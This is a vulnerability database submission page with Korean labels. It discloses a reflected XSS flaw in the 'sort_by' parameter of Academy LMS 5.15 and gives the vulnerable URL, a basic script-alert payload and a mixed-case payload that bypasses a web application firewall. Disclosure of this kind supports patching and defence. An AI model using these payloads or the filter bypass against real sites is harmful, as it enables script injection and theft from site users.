| 제목 | Academy LMS 5.15 - Reflected XSS |
|---|
| 설명 | # Exploit Title: Academy LMS 5.15 - Reflected XSS
# Exploit Author: skalvin aka (CraCkEr)
# Date: 09/07/2023
# Vendor: Creativeitem
# Vendor Homepage: https://creativeitem.com/
# Software Link: https://demo.creativeitem.com/academy/
# Version: 5.15
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
## Description
Allow Attacker to inject malicious code into website, give ability to steal sensitive
information, manipulate data, and launch additional attacks.
Path: /home/courses
GET parameter 'sort_by' is vulnerable to XSS
https://website/home/courses?category=photoshop&price=all&level=all&language=all&rating=all&sort_by=[XSS]
Simple XSS Payload (Blocked by WAF) : <script>alert(1)</script>
XSS Filter Bypass : ldt4d"><ScRiPt>alert(1)</ScRiPt>nuydd
[-] Done |
|---|
| 사용자 | skalvin (UID 49463) |
|---|
| 제출 | 2023. 07. 08. PM 11:38 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 07. 18. PM 06:26 (10 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 234422 [Creativeitem Academy LMS 5.15 /home/courses sort_by 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 17 |
|---|